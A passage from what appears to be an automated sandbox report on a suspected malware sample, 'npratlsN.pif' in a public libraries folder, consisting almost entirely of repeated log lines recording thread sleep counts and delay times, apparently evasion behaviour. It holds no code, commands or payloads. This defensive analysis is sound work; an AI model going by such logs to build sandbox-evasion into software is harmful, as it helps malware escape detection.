          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7024Thread sleep time: -598750s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7024Thread sleep time: -598640s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7024Thread sleep time: -598531s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7024Thread sleep time: -598421s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7024Thread sleep time: -598311s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7024Thread sleep time: -598203s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7024Thread sleep time: -598093s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7024Thread sleep time: -597984s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7024Thread sleep time: -597874s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7024Thread sleep time: -597764s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7024Thread sleep time: -597656s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7024Thread sleep time: -597541s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7024Thread sleep time: -597420s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7024Thread sleep time: -597312s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7024Thread sleep time: -597203s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7024Thread sleep time: -597093s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7024Thread sleep time: -596984s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7024Thread sleep time: -596875s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7024Thread sleep time: -596765s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7024Thread sleep time: -596656s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7024Thread sleep time: -596546s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7024Thread sleep time: -596437s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7024Thread sleep time: -596327s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7024Thread sleep time: -596218s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7024Thread sleep time: -596109s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7024Thread sleep time: -595999s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7024Thread sleep time: -595890s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7024Thread sleep time: -595779s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7024Thread sleep time: -595669s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7024Thread sleep time: -595555s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7024Thread sleep time: -595435s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7024Thread sleep time: -595321s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7024Thread sleep time: -595209s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7024Thread sleep time: -595072s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7024Thread sleep time: -594960s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7024Thread sleep time: -594781s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7024Thread sleep time: -594525s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7024Thread sleep time: -594404s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7024Thread sleep time: -594287s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7024Thread sleep time: -594159s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7024Thread sleep time: -594022s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7024Thread sleep time: -593824s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7668Thread sleep count: 37 > 30
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7668Thread sleep time: -34126476536362649s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7668Thread sleep time: -600000s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7656Thread sleep count: 3504 > 30
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7668Thread sleep time: -599890s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7656Thread sleep count: 6281 > 30
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7668Thread sleep time: -599782s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7668Thread sleep time: -599657s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7668Thread sleep time: -599545s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7668Thread sleep time: -599434s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7668Thread sleep time: -599326s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7668Thread sleep time: -599210s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7668Thread sleep time: -599104s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7668Thread sleep time: -598990s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7668Thread sleep time: -598841s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7668Thread sleep time: -598697s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7668Thread sleep time: -598389s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7668Thread sleep time: -598218s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7668Thread sleep time: -598085s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7668Thread sleep time: -597897s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7668Thread sleep time: -597751s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7668Thread sleep time: -597591s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7668Thread sleep time: -597425s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7668Thread sleep time: -597305s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7668Thread sleep time: -597141s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7668Thread sleep time: -597002s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7668Thread sleep time: -596828s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7668Thread sleep time: -596703s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7668Thread sleep time: -596551s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7668Thread sleep time: -596429s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7668Thread sleep time: -596258s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7668Thread sleep time: -596138s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7668Thread sleep time: -596031s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7668Thread sleep time: -595913s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7668Thread sleep time: -595774s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7668Thread sleep time: -595668s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7668Thread sleep time: -595559s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7668Thread sleep time: -595450s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7668Thread sleep time: -595340s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7668Thread sleep time: -595231s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7668Thread sleep time: -595121s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7668Thread sleep time: -595012s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7668Thread sleep time: -594903s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7668Thread sleep time: -594793s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7668Thread sleep time: -594684s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7668Thread sleep time: -594564s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7668Thread sleep time: -594450s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7668Thread sleep time: -594340s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7668Thread sleep time: -594231s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7668Thread sleep time: -594121s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7668Thread sleep time: -594012s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7668Thread sleep time: -593902s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7668Thread sleep time: -593792s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7668Thread sleep time: -593684s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7668Thread sleep time: -593573s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7668Thread sleep time: -593410s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7668Thread sleep time: -593293s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7668Thread sleep time: -593184s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7668Thread sleep time: -593075s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7668Thread sleep time: -592965s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7668Thread sleep time: -592844s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7668Thread sleep time: -592731s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7668Thread sleep time: -592621s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7668Thread sleep time: -592512s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7668Thread sleep time: -592403s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7668Thread sleep time: -592286s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 480Thread sleep count: 43 > 30
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 480Thread sleep time: -39660499758475511s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 480Thread sleep time: -600000s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 2852Thread sleep count: 5515 > 30
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 480Thread sleep time: -599875s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 2852Thread sleep count: 4320 > 30
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 480Thread sleep time: -599766s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 480Thread sleep time: -599641s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 480Thread sleep time: -599531s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 480Thread sleep time: -599422s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 480Thread sleep time: -599313s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 480Thread sleep time: -599188s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 480Thread sleep time: -599058s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 480Thread sleep time: -598932s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 480Thread sleep time: -598821s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 480Thread sleep time: -598653s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 480Thread sleep time: -598328s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 480Thread sleep time: -598219s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 480Thread sleep time: -598109s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 480Thread sleep time: -598000s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 480Thread sleep time: -597890s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 480Thread sleep time: -597781s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 480Thread sleep time: -597672s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 480Thread sleep time: -597563s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 480Thread sleep time: -597453s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 480Thread sleep time: -597314s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 480Thread sleep time: -597188s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 480Thread sleep time: -597078s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 480Thread sleep time: -596969s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 480Thread sleep time: -596859s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 480Thread sleep time: -596750s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 480Thread sleep time: -596638s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 480Thread sleep time: -596516s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 480Thread sleep time: -596406s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 480Thread sleep time: -596287s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 480Thread sleep time: -596156s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 480Thread sleep time: -596016s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 480Thread sleep time: -595688s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 480Thread sleep time: -595577s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 480Thread sleep time: -595468s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 480Thread sleep time: -595359s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 480Thread sleep time: -595250s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 480Thread sleep time: -595141s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 480Thread sleep time: -595031s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 480Thread sleep time: -594922s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 480Thread sleep time: -594812s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 480Thread sleep time: -594703s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 480Thread sleep time: -594594s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 480Thread sleep time: -594469s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 480Thread sleep time: -594359s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 480Thread sleep time: -594249s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 480Thread sleep time: -594141s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 480Thread sleep time: -594031s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 480Thread sleep time: -593922s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 480Thread sleep time: -593812s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 480Thread sleep time: -593703s >= -30000s
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\brightness.exeCode function: 4_2_029058B4 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,4_2_029058B4
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 600000Jump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 599843Jump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 599734Jump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 599625Jump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 599515Jump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 599406Jump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 599296Jump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 599187Jump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 599078Jump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 598968Jump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 598859Jump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 598750Jump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 598640Jump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 598531Jump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 598421Jump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 598311Jump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 598203Jump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 598093Jump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 597984Jump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 597874Jump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 597764Jump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 597656Jump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 597541Jump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 597420Jump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 597312Jump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 597203Jump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 597093Jump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 596984Jump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 596875Jump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 596765Jump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 596656Jump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 596546Jump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 596437Jump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 596327Jump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 596218Jump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 596109Jump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 595999Jump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 595890Jump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 595779Jump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 595669Jump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 595555Jump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 595435Jump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 595321Jump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 595209Jump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 595072Jump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 594960Jump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 594781Jump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 594525Jump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 594404Jump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 594287Jump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 594159Jump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 594022Jump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 593824Jump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 922337203685477
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 600000
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 599890
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 599782
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 599657
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 599545
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 599434
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 599326
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 599210
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 599104
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 598990
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 598841
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 598697
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 598389
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 598218
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 598085
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 597897
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 597751
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 597591
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 597425
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 597305
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 597141
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 597002
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 596828
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 596703
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 596551
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 596429
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 596258
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 596138
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 596031
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 595913
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 595774
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 595668
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 595559
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 595450
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 595340
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 595231
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 595121
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 595012
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 594903
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 594793
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 594684
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 594564
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 594450
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 594340
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 594231
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 594121
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 594012
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 593902
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 593792
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 593684
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 593573
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 593410
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 593293
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 593184
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 593075
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 592965
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 592844
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 592731
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 592621
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 592512
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 592403
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 592286
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 922337203685477
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 600000
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 599875
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 599766
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 599641
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 599531
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 599422
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 599313
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 599188
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 599058
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 598932
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 598821
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 598653
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 598328
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 598219
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 598109
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 598000
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 597890
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 597781
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 597672
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 597563
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 597453
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 597314
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 597188
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 597078
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 596969
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 596859
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 596750
